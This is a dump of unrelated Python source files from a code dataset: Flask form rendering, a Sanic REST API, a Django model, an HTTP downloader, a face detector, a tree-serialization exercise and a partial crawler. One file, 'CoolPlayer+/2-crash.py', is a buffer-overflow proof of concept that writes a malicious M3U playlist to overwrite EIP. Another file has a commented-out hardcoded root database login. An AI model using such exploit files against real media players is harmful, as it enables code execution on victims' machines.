    \"\"\").format(i)\n return i\n\nclass DateField(fields.DateField):\n widget = DateWidget()\n \n \n\nfield_renderers = {}\n\nclass FieldRenderer(object):\n __slots__ = [\"view\", \"field\", \"kwargs\", \"form_info\"]\n def __init__(self, view, field, form_info=None, **kwargs):\n self.view = view\n self.field = field\n self.kwargs = kwargs\n self.form_info = form_info\n\n def render_input(self):\n args = self.view.get_field_args(self.field)\n args.update(self.kwargs)\n return Markup(self.field(**args))\n\n def render_errors(self):\n if self.field.errors:\n return Markup(\"\").join((element(\"p\", self.view.error_attrs, i)\n for i in self.field.errors))\n else:\n return \"\"\n\n def render_description(self):\n if self.field.description:\n return element(\"p\", self.view.description_attrs,\n self.field.description)\n else:\n return \"\"\n\n def render_label(self):\n return self.field.label(**self.view.label_args)\n \n def __html__(self):\n l = self.render_label()\n\n i = Markup(\"{}{}{}\").format(self.render_input(),\n self.render_description(),\n self.render_errors())\n \n if self.view.field_div_attrs:\n i = element(\"div\", self.view.field_div_attrs, i)\n\n return l+i\n\nclass FormButton(object):\n __slots__ = [\"content\"]\n \n def __init__(self, content, **kwargs):\n self.content = content\n\n def __html__(self):\n return self.render(view=None, form_info=None)\n \nclass SubmitButton(FormButton):\n __slots__ = [\"name\", \"value\", \"action\", \"context_class\"]\n \n def __init__(self, text,\n name=None,\n value=None,\n action=None,\n context_class=\"primary\",\n **kwargs):\n super(SubmitButton, self).__init__(content=text, **kwargs)\n self.name = name\n self.value = value\n self.action = action\n self.context_class = context_class\n \n def render(self, view, form_info=None):\n attrs = {\"type\": \"submit\"}\n \n if self.name is not None:\n attrs[\"name\"] = self.name\n if self.value is not None:\n attrs[\"value\"] = self.value\n if self.action is not None:\n attrs[\"formaction\"] = self.action\n \n return button(self.content,\n context_class=self.context_class,\n attrs=attrs)\n\nclass ButtonGroup(FormButton):\n def get_div_attrs(self):\n return {\"class\": \"btn-group\"}\n \n def render(self, view, **kwargs):\n if not self.content:\n return \"\"\n \n c = Markup(\"\").join((i.render(self) if isinstance(i, FormButton) else i\n for i in self.content))\n return element(\"div\", self.get_div_attrs(), c)\n \n \nclass FormView(object):\n def __init__(self,\n buttons=None,\n method=\"POST\",\n **kwargs):\n self.field_renderers = {}\n self.label_args = {}\n self.field_div_attrs = None\n self.form_attrs = {}\n self.button_bar_attrs = {}\n self.method = method\n self.error_attrs = {}\n self.description_attrs = {}\n if buttons is None:\n self.buttons = [SubmitButton(lazy_gettext(\"OK\"))]\n else:\n self.buttons = buttons\n \n def get_field_args(self, field):\n return {}\n \n def render_field(self, field, form_info=None, **kwargs):\n if field.type in field_renderers:\n r = field_renderers[field.type]\n else:\n r = FieldRenderer\n return r(self, field, form_info=form_info, **kwargs)\n\n def render_fields(self, fields, form_info=None, **kwargs):\n l = []\n for i in fields:\n if isinstance(i, HiddenField):\n continue\n l.append(self.render_field(i,\n form_info=form_info,\n **kwargs))\n \n return Markup(\"\").join(l)\n\n def hidden_errors(self, form):\n l = (Markup(\"\").join((Markup('
<p class=\"text-danger\">\n    {}\n    </p>
    ').format(j)\n for j in i.errors))\n for i in form if isinstance(i, HiddenField))\n return Markup(\"\").join(l)\n \n def render(self, form, form_info=None):\n contents=Markup(\"{}{}{}{}\").format(\n form.hidden_tag(),\n self.hidden_errors(form),\n self.render_fields(form, form_info=form_info),\n self.render_footer(form_info=form_info)\n )\n \n attrs = dict(self.form_attrs)\n if any((isinstance(i, FileField) for i in form)):\n attrs[\"enctype\"] = \"multipart/form-data\"\n\n attrs[\"method\"] = self.method\n \n return element(\"form\", attrs, contents)\n\n def render_footer(self, form_info=None):\n if not self.buttons:\n return \"\"\n \n c = Markup(\"\").join((i.render(self, form_info=form_info)\n if isinstance(i, FormButton) else i\n for i in self.buttons))\n return element(\"div\", self.button_bar_attrs, c)\n\n def get_formfield_view(self):\n return self\n \n def __call__(self, form, form_info=None):\n return RenderProxy(self, form, form_info=form_info)\n\nclass RenderProxy(object):\n __slots__ = [\"obj\", \"args\", \"kwargs\"]\n \n def __init__(self, obj, *args, **kwargs):\n self.obj = obj\n self.args = args\n self.kwargs = kwargs\n \n def __html__(self):\n return self.obj.render(*self.args, **self.kwargs)\n\ndef field_renderer(t):\n def wrap(cls):\n field_renderers[t] = cls\n return cls\n return wrap\n\n@field_renderer('RadioField')\nclass RadioFieldRenderer(FieldRenderer):\n def render_input(self):\n itms = (Markup('
<div class=\"radio\">\n    <label>{} {}</label>\n    </div>').\n format(Markup(i), Markup(i.label.text))\n for i in self.field)\n return Markup(\"\").join(itms)\n\n\n@field_renderer('BooleanField')\nclass BooleanFieldRenderer(FieldRenderer):\n def render_input(self):\n return Markup(self.field(**self.kwargs))\n \n def __html__(self):\n l = \"\"\n if self.view.label_args:\n l = element(\"div\", self.view.label_args, \"\")\n\n i = Markup('
<div class=\"checkbox\"><label>\n    {}{}\n    </label>{}{}</div>
    ')\\\n .format(self.render_input(),\n self.field.label.text,\n self.render_description(),\n self.render_errors())\n \n if self.view.field_div_attrs:\n i = element(\"div\", self.view.field_div_attrs, i)\n\n return l+i\n\n@field_renderer('FormField')\nclass FormFieldRenderer(FieldRenderer):\n def render_input(self):\n v = self.view.get_formfield_view()\n c = Markup(\"{}{}\").format(self.field.hidden_tag(),\n v.render_fields(self.field,\n form_info=self.form_info))\n return element(\"div\", v.form_attrs, c)\n \n def render_errors(self):\n return \"\"\n \nclass VerticalFormView(FormView):\n formfield_view = None\n \n def __init__(self, formfield_view=None, **kwargs):\n super(VerticalFormView, self).__init__(**kwargs)\n if any((isinstance(i, ButtonGroup) for i in self.buttons)):\n self.button_bar_attrs = {\"class\": \"btn-toolbar\"}\n self.error_attrs = {\"class\": \"help-block\"}\n self.description_attrs = {\"class\": \"help-block\"}\n if formfield_view is not None:\n self.formfield_view = formfield_view\n \n def render_field(self, field, **kwargs):\n cls = \"form-group\"\n if field.errors:\n cls += \" has-error\"\n if field.flags.required:\n cls += \" required\"\n \n return element(\"div\", {\"class\": cls},\n super(VerticalFormView, self).render_field(field,\n **kwargs)) \n def get_field_args(self, field):\n return {\"class\": \"form-control\"}\n\n def get_formfield_view(self):\n return self.formfield_view or HorizontalFormView()\n\n \nclass HorizontalFormView(VerticalFormView):\n def __init__(self, widths=[3, 9], size=\"md\", **kwargs):\n super(HorizontalFormView, self).__init__(**kwargs)\n self.label_args = {\"class\": \"control-label col-{}-{}\".format(size,\n widths[0])}\n self.field_div_attrs = {\"class\": \"col-{}-{}\".format(size, widths[1])}\n self.form_attrs = {\"class\": \"form-horizontal\"}\n \nclass FormPart(object):\n __slots__ = [\"fields\", \"view\", \"name\", \"title\"]\n def __init__(self, title, view, fields=None, name=None):\n self.title = title\n self.view = view\n if fields is None:\n self.fields = view.get_owned_fields()\n else:\n self.fields = fields\n\n if name is None:\n self.name = \"form-part-\" + sha256(title).hexdigest()\n else:\n self.name = name\n \n def get_owned_fields(self):\n return self.fields\n\n def filter_own_fields(self, fields):\n own = []\n own_set = set()\n rest = []\n\n for i in self.get_owned_fields():\n for j in fields:\n if j.name == i:\n own.append(j)\n own_set.add(j)\n\n rest = [i for i in fields if i not in own_set]\n\n return own, rest\n \nclass HierarchicalFormView(FormView):\n def __init__(self, rest_view=None, **kwargs):\n super(HierarchicalFormView, self).__init__(**kwargs)\n self.rest_view = rest_view\n self.parts = []\n \n def get_owned_fields(self):\n return chain(*(i.get_owned_fields() for i in self.tabs))\n\n def add_part(self, part):\n self.parts.append(part)\n\n \nclass TabbedFormView(HierarchicalFormView):\n def add_tab(self, title, fields=None, view=None, name=None):\n if view is None:\n view = HorizontalFormView()\n self.add_part(FormPart(title, view, fields=fields, name=name))\n\n def render_fields(self, fields, form_info=None):\n tb = ClientSideTabbar()\n f = fields\n for i in self.parts:\n of, f = i.filter_own_fields(f)\n\n t = i.title\n\n if any((i.errors for i in of)):\n t = Markup('<span class=\"text-danger glyphicon glyphicon-exclamation-sign\"></span> {}').format(t) \n \n tb.add_tab(t,\n element(\"div\",\n i.view.form_attrs,\n i.view.render_fields(of, form_info=form_info)),\n name=i.name)\n rest = \"\"\n if f:\n if not self.rest_view:\n raise ValueError(\"Not all fields assigned to 
parts\")\n \n rest = element(\"div\",\n self.rest_view.form_attrs,\n self.rest_view.render_fields(f,\n form_info=form_info))\n\n return Markup(\"{}{}\").format(rest, tb)\n\nclass FormPanel(FormPart):\n __slots__ = [\"footer\", \"width\", \"border\", \"column\"]\n def __init__(self, view,\n title=None, footer=None, name=None,\n width=None,\n column=None,\n border=\"default\",\n **kwargs):\n \n if name is None:\n name = \"form-panel-\" + sha256(u\"{}{}\".format(title,\n footer)).hexdigest()\n\n super(FormPanel, self).__init__(title, view,\n name=name,\n **kwargs)\n\n self.footer = footer\n self.width = width\n self.border = border\n if column is None:\n if width is not None:\n column = GridColumn(width=width)\n self.column = column\n\n def should_be_wrapped_in_row(self):\n return self.column is not None\n \n def panel_wrapper(self, content):\n if self.border is not None:\n content = element(\"div\",\n {\"class\": \"panel-body\"},\n content)\n\n if self.title is not None:\n content = element(\"div\",\n {\"class\": \"panel-heading\"},\n self.title) + content\n \n content = element(\"div\",\n {\"class\": \"panel panel-{}\".format(self.border)},\n content)\n\n\n if self.column:\n content = self.column.render(content)\n \n return content\n \nclass PanelizedFormView(HierarchicalFormView):\n def __init__(self, breakpoint='md', **kwargs):\n super(PanelizedFormView, self).__init__(**kwargs)\n self.breakpoint = breakpoint\n \n def add_panel(self,\n title=None,\n fields=None,\n width=None,\n column=None,\n footer=None,\n view=None,\n name=None,\n border=\"default\"):\n if view is None:\n view = VerticalFormView()\n \n self.add_part(FormPanel(view,\n title=title,\n footer=footer,\n fields=fields,\n name=name,\n border=border,\n width=width,\n column=column))\n\n def render_fields(self, fields, form_info=None):\n f = fields\n output = []\n to_wrap = []\n wrapped = False\n for i in self.parts:\n of, f = i.filter_own_fields(f)\n\n t = i.title\n\n fm = element(\"div\",\n i.view.form_attrs,\n i.view.render_fields(of,\n form_info=form_info))\n\n if i.should_be_wrapped_in_row():\n to_wrap.append(i.panel_wrapper(fm))\n \n else:\n if to_wrap:\n output.append(element(\"div\",\n {\"class\": \"row\"},\n Markup(\"\").join(to_wrap)))\n to_wrap = []\n\n output.append(i.panel_wrapper(fm))\n\n if to_wrap:\n output.append(element(\"div\",\n {\"class\": \"row\"},\n Markup(\"\").join(to_wrap)))\n \n return Markup(\"\").join(output)\n \n \n \nclass FormEndpoint(View):\n methods = ['GET', 'POST']\n formview = HorizontalFormView()\n\n def get_form_info(self):\n return {}\n \n def dispatch_request(self, **kwargs):\n self.form = self.create_form(**kwargs)\n if self.form.validate_on_submit():\n res = self.submitted(**kwargs)\n if res is not None:\n return res\n return self.render_form(**kwargs)\n \n def render_form(self, **kwargs):\n return self.render_template(self.formview(self.form,\n form_info=self.get_form_info()))\n\n \n","sub_path":"appshell/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"597248800","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\n\nsep = os.path.sep\nproj_dir = os.path.normpath(os.path.dirname(os.path.abspath(__file__)).split('sbin')[0])\nif proj_dir not in sys.path:\n sys.path.insert(0, proj_dir)\nfrom com.ericsson.xn.commons.CommonUtil import pre_check\npre_check(['Linux', 'Darwin', 'Windows'], False, True)\n\nfrom com.ericsson.xn.dbcommons.MysqlCommons import DbInstance\nfrom com.ericsson.xn.commons.PyProperties import Properties\n\n\ndef insert_a_ne(db_instance):\n ne_dir = os.path.normpath(proj_dir + sep + 'config' + sep + 'mysql_conf' + sep + 'nes')\n f_list = os.listdir(ne_dir)\n ne_file = os.path.normpath(ne_dir + sep + 'ne')\n ne_dict = Properties(ne_file, True).get_map()\n id = db_instance.get_max_nes_id() + 1\n db_instance.insert_ne(ne_dict, id)\n\n\ndef init_connect():\n db_file = os.path.normpath(proj_dir + sep + 'config' + sep + 'mysql_conf' + sep + 'db')\n db = Properties(db_file, True).get_map()\n i = DbInstance(db['host'], db['username'], db['password'], int(db['port']), db['database'])\n if i.connect():\n return i\n\nif __name__ == '__main__':\n i = init_connect()\n if i:\n insert_a_ne(i)\n i.close()\n\n'''\ndb = DbInstance('192.168.96.133', 'root', 'root', 3306, 'xoam')\nif db.connect():\n print db.insert_ne(None)\ndb.close()\n'''","sub_path":"sbin/db_actions_main.py","file_name":"db_actions_main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"233953685","text":"import pyautogui as gui\nimport os\n\nGEST_START = (\"N\", \"E\", \"S\", \"W\")\nGEST_CLOSE = (\"SE\", \"N\", \"SW\")\nGEST_COPY = (\"W\", \"S\", \"E\")\nGEST_PASTE = (\"SE\", \"NE\")\nGEST_CUT = (\"SW\", \"N\", \"SE\")\nGEST_ALT_TAB = (\"SE\", \"SW\")\nGEST_ALT_SHIFT_TAB = (\"SW\", \"SE\")\nGEST_MAXIMISE = (\"N\",)\nGEST_MINIMISE = (\"S\",)\nGEST_LOCK = (\"S\", \"E\")\nGEST_TASK_MANAGER = (\"E\", \"W\", \"S\")\nGEST_NEW_FILE = (\"N\", \"SE\", \"N\")\nGEST_SELECT_ALL = (\"NE\", \"SE\", \"NW\", \"W\")\n\nGESTURES = {GEST_CUT: ('ctrlleft', 'x'),\nGEST_CLOSE: ('altleft', 'f4'),\nGEST_ALT_SHIFT_TAB: ('altleft', 'shiftleft', 'tab'),\nGEST_PASTE: ('ctrlleft', 'v'),\nGEST_ALT_TAB: ('altleft', 'tab'),\nGEST_COPY: ('ctrlleft', 'c'),\nGEST_NEW_FILE: ('ctrlleft', 'n'),\nGEST_SELECT_ALL: ('ctrlleft', 'a')}\n\nif os.name == 'nt':\n GESTURES[GEST_START] = ('winleft',)\n GESTURES[GEST_LOCK] = ('winleft', 'l')\n GESTURES[GEST_TASK_MANAGER] = ('ctrlleft', 'shiftleft', 'esc')\nelse:\n GESTURES[GEST_START] = ('altleft', 'f1')\n GESTURES[GEST_LOCK] = ('ctrlleft', 'altleft', 'l')\n GESTURES[GEST_TASK_MANAGER] = ('ctrlleft', 'esc')\n\ndef do_gesture_action(gesture):\n if gesture in GESTURES.keys():\n keys = list(GESTURES[gesture])\n last_key = keys.pop()\n if len(keys) >= 1:\n for key in keys:\n gui.keyDown(key)\n gui.press(last_key)\n if len(keys) >= 1:\n keys.reverse()\n for key in keys:\n gui.keyUp(key)\n","sub_path":"gesture_api.py","file_name":"gesture_api.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631301524","text":"import sys\nimport inspect\n\nfrom sanic import Sanic, Blueprint\nfrom sanic.response import json, text, HTTPResponse\n\nfrom . 
import default_processor\nfrom .utils import ok, fail\nfrom trump import log\n\n\nbp = Blueprint('restapi')\n\napp = None\n\nlogger = log.Logger(__name__)\n\n\nasync def user_loader(app, request):\n request['user'] = request.get('session', {}).get('user')\n\n\nasync def _process(method, app, request, name, *args, **kargs):\n if app.views.get(name) and hasattr(app.views.get(name), method):\n # pre process\n func = getattr(app.views.get(name), method)\n if hasattr(func, 'login_required') and getattr(func, 'login_required') == False:\n pass\n else:\n if not request.get('user'):\n return fail('Not login.', status=401)\n result = await func(app, request, *args)\n if isinstance(result, HTTPResponse):\n return result\n # default process\n table_name = getattr(app.views.get(name), '__table__', name)\n kargs['table_name'] = table_name\n if table_name not in app.tables: return fail('404 no such table', status=404)\n try:\n result = await getattr(default_processor, method)(app, request, name, *args, **kargs)\n # post process\n post_proc = getattr(app.views.get(name), 'post_' + method, None)\n if post_proc:\n post_kargs = kargs.copy()\n post_kargs.pop('table_name')\n post_result = await post_proc(app, request, result, *args, **post_kargs)\n if post_result:\n if isinstance(post_result, HTTPResponse): \n return post_result\n else:\n result = post_result\n if not result and method == 'get':\n return fail(status=404)\n #\n return ok(result)\n except Exception as e:\n import traceback\n traceback.print_exc()\n return fail(traceback.format_exc())\n else:\n return fail('404 not found', status=404)\n\n\nmethod_processor_dir = {\n 'GET': 'ls',\n 'POST': 'post',\n}\n\nmethod_processor_item = {\n 'GET': 'get',\n 'PUT': 'put',\n 'DELETE': 'delete',\n}\n\nasync def _proc(request, name, oid=None):\n response = None\n #\n if request.method == 'OPTIONS':\n func = getattr(app.views.get(name), 'options', None)\n if func:\n response = await func(app, request)\n else:\n response = text(None)\n #\n elif not oid and request.method in method_processor_dir:\n response = await _process(method_processor_dir.get(request.method),\n app, request, name)\n elif oid and request.method in method_processor_item:\n response = await _process(method_processor_item.get(request.method),\n app, request, name, oid)\n #\n return response if response else fail('Not impl.', status=400)\n\n\n@bp.route(f'/', methods=['GET', 'POST', 'OPTIONS'])\nasync def process_dir(request, name):\n return await _proc(request, name)\n\n\n@bp.route(f'//', methods=['GET', 'PUT', 'DELETE', 'OPTIONS'])\nasync def process_item(request, name, oid):\n return await _proc(request, name, oid)\n\n\n@bp.middleware('request')\nasync def load_user(request):\n uuid = request.get('uuid')\n if user_loader:\n await user_loader(app, request)\n await logger.info(uuid, inspect.currentframe().f_code.co_name, request.get('user'))\n","sub_path":"trump/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210951768","text":"'''\nDCP #3\nThis problem was asked by Google.\n\nGiven the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\n\nFor example, given the following Node class\n\nclass Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nThe following test should pass:\n\nnode = 
Node('root', Node('left', Node('left.left')), Node('right'))\nassert deserialize(serialize(node)).left.left.val == 'left.left'\n'''\n\nclass Node(object):\n def __init__(self, x, left=None, right=None):\n self.val = x\n self.left = left\n self.right = right\n\ndef serialize(root):\n \"\"\"Encodes a tree to a single string.\n :type root: Node\n :rtype: str\n \"\"\"\n if(root==None):\n return \"\"\n def dfs(node):\n if node:\n result.append(str(node.val))\n dfs(node.left)\n dfs(node.right)\n #preorder traversal\n else:\n result.append('-1')\n result = []\n dfs(root)\n #print(result)\n return ' '.join(result)\n \n\ndef deserialize(data):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: Node\n \"\"\"\n if(len(data)==0):\n return None\n def dfs():\n val=next(result)\n if(val == '-1'):\n return None\n else:\n node=Node(val) #reconstructing tree\n node.left=dfs()\n node.right=dfs()\n return node\n result=iter(data.split())\n return dfs()\n\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\nassert deserialize(serialize(node)).left.left.val == 'left.left'","sub_path":"Tree/BinaryTreeSerialization.py","file_name":"BinaryTreeSerialization.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"429190825","text":"#! /usr/bin/python\n\njunk = \"A\" * 260\neip = \"B\" * 4\nfill = \"C\" * (5000-len(junk)-len(eip))\n\nbuffer = junk + eip + fill\n\nf=open(\"exploit.m3u\",\"w\")\nf.write(buffer);\nf.close()\n","sub_path":"CoolPlayer+/2-crash.py","file_name":"2-crash.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"635981148","text":"from django.core.validators import MaxLengthValidator\nfrom django.db import models\n\n\nclass ChangeRequest(models.Model):\n \"\"\"\n SNow Change Request Model Class.\n \"\"\"\n\n # The state of the Change Request\n TICKET_STATE_OPEN = '1'\n TICKET_STATE_IN_PROGRESS = '2'\n TICKET_STATE_COMPLETE = '3'\n TICKET_STATE_COMPLETE_WITH_ERRORS = '4'\n TICKET_STATE_CHOICES = (\n (TICKET_STATE_OPEN, 'Open'),\n (TICKET_STATE_IN_PROGRESS, 'In Progress'),\n (TICKET_STATE_COMPLETE, 'Complete'),\n (TICKET_STATE_COMPLETE_WITH_ERRORS, 'Complete With Errors'),\n )\n\n # The 32 character GUID for a SNow record\n sys_id = models.UUIDField(\n max_length=32,\n primary_key=True\n )\n\n number = models.CharField(\n max_length=32,\n help_text=\"The Change Order number\"\n )\n\n title = models.CharField(\n max_length=160, # From the Change Request Title field's maxlength\n help_text=\"Title of the ServiceNow Change Request\"\n )\n\n description = models.TextField(\n # From the Change Request Description's data-length attribute\n validators=[MaxLengthValidator(4000)],\n help_text=\"Description of the ServiceNow Change Request\"\n )\n\n # The GUID of the Group to which the Ticket was assigned to\n assignment_group_guid = models.UUIDField(\n max_length=32\n )\n\n state = models.CharField(\n max_length=max([len(x[0]) for x in TICKET_STATE_CHOICES]),\n choices=TICKET_STATE_CHOICES,\n help_text='The current state the the change order is in.'\n )\n\n def __str__(self):\n return self.number\n\n class Meta:\n verbose_name = 'service-now change request'\n verbose_name_plural = 'service-now change 
requests'\n","sub_path":"django_snow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"371866262","text":"import urllib3, urlparse, urllib, time\nfrom scrapy.selector import HtmlXPathSelector\nfrom datetimeutil import unix_time\nimport random\n\n_SITES_RATE_LIMIT = {\n \"mp3.easou.com\" : 1.0,\n 'music.douban.com' : 2.0, \n 'douban.fm' : 2.0, \n 'music.baidu.com' : 2.0, \n }\n\n_SITES_LAST_ACCESS = {}\n\n_NUM_POOLS = 10\n_TIMEOUT = 30\n_DEFAULT_HEADER = {}\n#_DEFAULT_HEADER = {\n# 'Accept' :\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n# 'Accept-Charset' : \"ISO-8859-1,utf-8;q=0.7,*;q=0.3\",\n# 'Accept-Encoding' : \"gzip,deflate,sdch\",\n# 'Accept-Language' : \"en-US,en;q=0.8\",\n# 'Cache-Control' : 'max-age=0',\n# 'Connection' :'keep-alive',\n# 'User-Agent' :\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19\"\n# } \n\n_HTTP = urllib3.PoolManager(num_pools = _NUM_POOLS, timeout = _TIMEOUT)\n_PROXY = {}\n\n\nclass Response(object):\n def __init__(self, status = 200, body = None, headers = {}):\n self.status = status\n self.body = body\n self.headers = headers\n\nclass DownloadException(Exception):\n def __init__(self, status):\n self.status = status \n def __str__(self):\n return \"Status = %s\" % self.status\n \ndef download(url, method = \"GET\", params = {}, body = None, headers = {}, proxys = []): \n if not url:\n raise DownloadException(\"Url is None\")\n \n if isinstance(url, unicode):\n url = url.encode('utf8')\n for k, v in params.iteritems():\n if isinstance(v, unicode):\n params[k] = v.encode('utf8') \n \n if params:\n if method == \"GET\" and url.find('?') == -1: \n url = url + \"?\" + urllib.urlencode(params)\n elif method == \"POST\":\n body = urllib.urlencode(params)\n \n parse = urlparse.urlparse(url) \n site = parse.netloc\n \n if _SITES_RATE_LIMIT.has_key(site):\n global _SITES_LAST_ACCESS\n last_visit = _SITES_LAST_ACCESS.get(site)\n now = unix_time() \n if last_visit:\n waittime = last_visit + _SITES_RATE_LIMIT[site] - now\n if waittime > 0:\n time.sleep(waittime)\n _SITES_LAST_ACCESS[site] = now \n \n \n proxy = proxys[random.randint(0, len(proxys) - 1)] if proxys else None\n\n pool = _HTTP\n if proxy: \n if not _PROXY.has_key(proxy):\n _PROXY[proxy] = urllib3.proxy_from_url(proxy)\n pool = _PROXY[proxy]\n _headers = _DEFAULT_HEADER\n _headers[\"Host\"] = parse.netloc\n for k, v in headers.iteritems():\n if not v and _headers.has_key(k):\n _headers.pop(k)\n else:\n _headers[k] = v \n\n resp = pool.urlopen(method = method, url = url, body = body, headers = _headers)\n resp = process_response(resp)\n if resp.status in [301, 302]:\n redirect_url = resp.headers.get('location')\n resp = download(url = redirect_url, method = method, params = params, body = body, headers = headers, proxys = proxys) \n elif resp.status >= 400:\n raise DownloadException(status = resp.status)\n\n return resp \n \ndef process_response(resp):\n status = resp.status\n headers = resp.headers\n data = resp.data\n \n if status == 200:\n charset = None\n mime_type = None\n m = headers.get('content-type') \n \n if m:\n fields = m.split(';')\n mime_type = fields[0].lower().strip()\n if len(fields) > 1:\n words = fields[1].split('=')\n if len(words) == 2:\n if words[0].lower().strip() == 'charset':\n charset = words[1].strip()\n \n if mime_type == \"text/html\" and not charset:\n try:\n hxs = 
HtmlXPathSelector(text = data.lower())\n content_type = hxs.select(\"//meta[@http-equiv='content-type']/@content\").extract()[0] \n k, v = content_type.split(';')[1].split('=') \n if k.lower().strip() == 'charset':\n charset = v.strip()\n except:\n pass\n \n if charset:\n try:\n data = unicode(data, charset)\n except:\n if charset.lower() == 'gb2312':\n #try to decode as gbk\n try:\n data = unicode(data, 'gbk')\n except:\n pass\n \n return Response(status = resp.status, headers = headers, body = data) ","sub_path":"contentservice/utils/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"387576838","text":"\"\"\"\nThis script is a face detector that uses a provided pre-trained Haar cascade.\nThe results are not accurate enough, so this approach was not pursued further.\n\"\"\"\n\nimport numpy as np\nimport os, sys\nimport cv2\nimport CONSTANT\nsys.path.append(CONSTANT.ROOT_DIR)\n\n# Load the pre-trained XML cascade classifier\ndef face_region_detector(pic_name):\n face_cascade = cv2.CascadeClassifier(CONSTANT.EMOTION_DIRECTORY_PATH + 'Face_Region_Detection/haar_cascades/haarcascade_frontalface_default.xml')\n\n img = cv2.imread(pic_name)\n # img.resize((CONSTANT.IMAGE_RESIZE_SHAPE[0], CONSTANT.IMAGE_RESIZE_SHAPE[1]))\n\n cv2.waitKey(0)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n face_rois = [] # Store rectangle(s) which contain faces\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = img[y:y + h, x:x + w]\n\n face_rois.append((x, y, x+w, y+h))\n\n # cv2.imshow('img', img)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n return face_rois\n\n# face_region_detector('picture.jpg')\n\n# import numpy as np\n# import cv2\n#\n# face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#\n# cap = cv2.VideoCapture(0)\n#\n# while 1:\n# ret, img = cap.read()\n# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n#\n# for (x, y, w, h) in faces:\n# cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n# roi_gray = gray[y:y + h, x:x + w]\n# roi_color = img[y:y + h, x:x + w]\n#\n# cv2.imshow('img', img)\n# k = cv2.waitKey(30) & 0xff\n# if k == 27:\n# break\n#\n# cap.release()\n# cv2.cv2.destroyAllWindows()\n","sub_path":"Face_Region_Detection/face_region_detector.py","file_name":"face_region_detector.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"202614937","text":"import tablib, bs4, urllib.request, requests, os\nimport openpyxl\n\ncode_list = [\"001050662\",\"001050661\",\"001050660\",\"001050659\",\"001239125\",\"000700011\"]\ncrawl_list = tablib.Dataset(headers=['Goods name','Brand name','Price','Img URL'])\nbase = os.getcwd()\nif os.path.exists(base+'/WIZWID'):\n pass\nelse:\n os.makedirs(base+'/WIZWID')\n\ndef wizwid_crawl(code,page,idx):\n url = 'https://www.wizwid.com/CSW/handler/wizwid/kr/Catalog-Start?CategoryID={code}&Flag=&OrderType=New&MaxRowNum=1000&PageNO={page}&CouponYn=&SaleYn=&SordOut=&Delivery1=&Delivery2=&RPrice=#browseOptions'.format(code=code,page = page)\n data = requests.get(url)\n # print(data)\n # print(data.text)\n # print(url)\n soup = bs4.BeautifulSoup(data.text,'html.parser')\n base_directory = \"Z:\\메이드트렌\\크롤링데이터/\"\n list_box = 
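# process_response in downloader.py above falls back from a declared gb2312
# codec to gbk (a superset of gb2312) when decoding fails. The same fallback
# chain in modern Python 3 form (a sketch; the extra utf-8/latin-1 candidates
# are an assumption, not taken from the original):

def decode_html(raw, declared=None):
    candidates = []
    if declared:
        candidates.append(declared)
        if declared.lower() == 'gb2312':
            candidates.append('gbk')  # decodes everything gb2312 does, and more
    candidates += ['utf-8', 'latin-1']  # latin-1 maps every byte, so it never fails
    for codec in candidates:
        try:
            return raw.decode(codec)
        except (UnicodeDecodeError, LookupError):
            continue
    return raw.decode('utf-8', errors='replace')  # unreachable while latin-1 is listed

assert decode_html('镕'.encode('gbk'), declared='gb2312') == '镕'  # in GBK, not GB2312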
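# face_region_detector above returns boxes as (x1, y1, x2, y2) rather than
# OpenCV's native (x, y, w, h). A caller-side sketch of cropping those boxes
# out of the image (crop_faces is a hypothetical helper, not in the file):

import cv2

def crop_faces(image_path, face_rois):
    img = cv2.imread(image_path)
    # numpy slicing is rows (y) first, then columns (x)
    return [img[y1:y2, x1:x2] for (x1, y1, x2, y2) in face_rois]

# usage (assumed file name): crop_faces('picture.jpg', face_region_detector('picture.jpg'))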
